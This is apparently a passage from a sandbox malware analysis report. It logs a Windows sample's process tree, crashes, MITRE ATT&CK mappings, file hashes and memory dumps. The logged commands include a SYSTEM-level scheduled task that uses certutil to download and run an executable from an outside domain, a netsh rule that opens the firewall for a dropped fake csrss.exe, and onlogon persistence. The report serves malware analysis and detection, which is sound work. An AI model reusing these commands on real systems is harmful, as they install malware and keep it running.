PID 1860 wrote to memory of 4332	1860	svchost.exe	schtasks.exe
PID 1860 wrote to memory of 4332	1860	svchost.exe	schtasks.exe
PID 1860 wrote to memory of 4508	1860	svchost.exe	patch.exe
PID 1860 wrote to memory of 4508	1860	svchost.exe	patch.exe
PID 2480 wrote to memory of 2320	2480	csrss.exe	bcdedit.exe
PID 2480 wrote to memory of 2320	2480	csrss.exe	bcdedit.exe

C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
"C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 328
2⤵
- Program crash
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 332
2⤵
- Program crash
PID:1408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 332
2⤵
- Program crash
PID:3880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 624
2⤵
- Program crash
PID:1556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 704
2⤵
- Program crash
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 704
2⤵
- Program crash
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 736
2⤵
- Program crash
PID:1644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 744
2⤵
- Program crash
PID:224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 744
2⤵
- Program crash
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 704
2⤵
- Program crash
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 464
2⤵
- Program crash
PID:984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 756
2⤵
- Program crash
PID:4052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 752
2⤵
- Program crash
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 864
2⤵
- Program crash
PID:1088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 736
2⤵
- Program crash
PID:3100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 464
2⤵
- Program crash
PID:2472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 852
2⤵
- Program crash
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 840
2⤵
- Program crash
PID:4800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 624
2⤵
- Program crash
PID:928

C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
"C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe"
2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 292
3⤵
- Program crash
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 296
3⤵
- Program crash
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 296
3⤵
- Program crash
PID:4984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 628
3⤵
- Program crash
PID:3284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 676
3⤵
- Program crash
PID:956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 692
3⤵
- Program crash
PID:2244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 676
3⤵
- Program crash
PID:2248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 720
3⤵
- Program crash
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 716
3⤵
- Program crash
PID:3412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 776
3⤵
- Program crash
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 832
3⤵
- Program crash
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:4348

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies Windows Firewall
PID:616

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 328
4⤵
- Program crash
PID:700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 332
4⤵
- Program crash
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 332
4⤵
- Program crash
PID:3460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 604
4⤵
- Program crash
PID:3076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 696
4⤵
- Program crash
PID:3652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 720
4⤵
- Program crash
PID:4704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 720
4⤵
- Program crash
PID:8

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 752
4⤵
- Program crash
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 784
4⤵
- Program crash
PID:3508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 884
4⤵
- Program crash
PID:364

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 948
4⤵
- Program crash
PID:2056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 808
4⤵
- Program crash
PID:4296

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 980
4⤵
- Program crash
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 628
4⤵
- Program crash
PID:4428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1008
4⤵
- Program crash
PID:2012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1000
4⤵
- Program crash
PID:3532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1000
4⤵
- Program crash
PID:1088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 628
4⤵
- Program crash
PID:3100

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
- Executes dropped EXE
PID:4508

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:2320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1076
4⤵
- Program crash
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1072
4⤵
- Program crash
PID:4684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1072
4⤵
- Program crash
PID:2940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1072
4⤵
- Program crash
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 608
3⤵
- Program crash
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 760
2⤵
- Program crash
PID:1436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 664 -ip 664
1⤵
PID:2744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 664 -ip 664
1⤵
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 664 -ip 664
1⤵
PID:4716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 664 -ip 664
1⤵
PID:4744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 664 -ip 664
1⤵
PID:4616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 664 -ip 664
1⤵
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 664 -ip 664
1⤵
PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 664 -ip 664
1⤵
PID:320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 664 -ip 664
1⤵
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 664 -ip 664
1⤵
PID:4724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 664 -ip 664
1⤵
PID:2012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 664 -ip 664
1⤵
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 664 -ip 664
1⤵
PID:3672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 664 -ip 664
1⤵
PID:4816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 664 -ip 664
1⤵
PID:1068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 664 -ip 664
1⤵
PID:3972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 664 -ip 664
1⤵
PID:3364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 664 -ip 664
1⤵
PID:2116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 664 -ip 664
1⤵
PID:4152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 664 -ip 664
1⤵
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3524 -ip 3524
1⤵
PID:3256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3524 -ip 3524
1⤵
PID:1232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3524 -ip 3524
1⤵
PID:2036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3524 -ip 3524
1⤵
PID:3192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3524 -ip 3524
1⤵
PID:1796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3524 -ip 3524
1⤵
PID:4628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3524 -ip 3524
1⤵
PID:4452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3524 -ip 3524
1⤵
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3524 -ip 3524
1⤵
PID:864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3524 -ip 3524
1⤵
PID:1984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3524 -ip 3524
1⤵
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 3524 -ip 3524
1⤵
PID:1872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2480 -ip 2480
1⤵
PID:1800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2480 -ip 2480
1⤵
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 2480 -ip 2480
1⤵
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2480 -ip 2480
1⤵
PID:1916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2480 -ip 2480
1⤵
PID:3160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2480 -ip 2480
1⤵
PID:4908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2480 -ip 2480
1⤵
PID:520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2480 -ip 2480
1⤵
PID:2748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2480 -ip 2480
1⤵
PID:1372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 2480 -ip 2480
1⤵
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2480 -ip 2480
1⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2480 -ip 2480
1⤵
PID:2008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 2480 -ip 2480
1⤵
PID:220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 2480 -ip 2480
1⤵
PID:1444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2480 -ip 2480
1⤵
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2480 -ip 2480
1⤵
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2480 -ip 2480
1⤵
PID:4816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2480 -ip 2480
1⤵
PID:4580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2480 -ip 2480
1⤵
PID:1128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2480 -ip 2480
1⤵
PID:4132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2480 -ip 2480
1⤵
PID:3780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2480 -ip 2480
1⤵
PID:4656

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
7fc701478f1d43c3e62ff6d9c434ee77

SHA1
790ba947810a29810ca9d5738abc6b03c9805cce

SHA256
5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb

SHA512
d1ede33eeeb3d5d2dd44f73fda21bef9ae60c6a9c10d71aa9d5b57d2b233c7793f7b0e1deea1bf74f5084191bc86afa5ccb60803051efbe9491a3960a515e456

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
7fc701478f1d43c3e62ff6d9c434ee77

SHA1
790ba947810a29810ca9d5738abc6b03c9805cce

SHA256
5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb

SHA512
d1ede33eeeb3d5d2dd44f73fda21bef9ae60c6a9c10d71aa9d5b57d2b233c7793f7b0e1deea1bf74f5084191bc86afa5ccb60803051efbe9491a3960a515e456

Download Submit
memory/616-141-0x0000000000000000-mapping.dmp

Download
memory/664-133-0x0000000001320000-0x0000000001B25000-memory.dmp

Filesize
8.0MB

Download
memory/664-134-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/664-135-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/664-132-0x0000000000F68000-0x0000000001310000-memory.dmp

Filesize
3.7MB

Download
memory/664-139-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/2320-155-0x0000000000000000-mapping.dmp

Download
memory/2480-150-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/2480-149-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/2480-143-0x0000000000000000-mapping.dmp

Download
memory/2480-146-0x0000000001400000-0x00000000017A8000-memory.dmp

Filesize
3.7MB

Download
memory/2480-147-0x0000000001800000-0x0000000002005000-memory.dmp

Filesize
8.0MB

Download
memory/3112-151-0x0000000000000000-mapping.dmp

Download
memory/3524-148-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/3524-138-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/3524-142-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/3524-137-0x0000000000FDA000-0x0000000001382000-memory.dmp

Filesize
3.7MB

Download
memory/3524-136-0x0000000000000000-mapping.dmp

Download
memory/4332-152-0x0000000000000000-mapping.dmp

Download
memory/4348-140-0x0000000000000000-mapping.dmp

Download
memory/4508-153-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads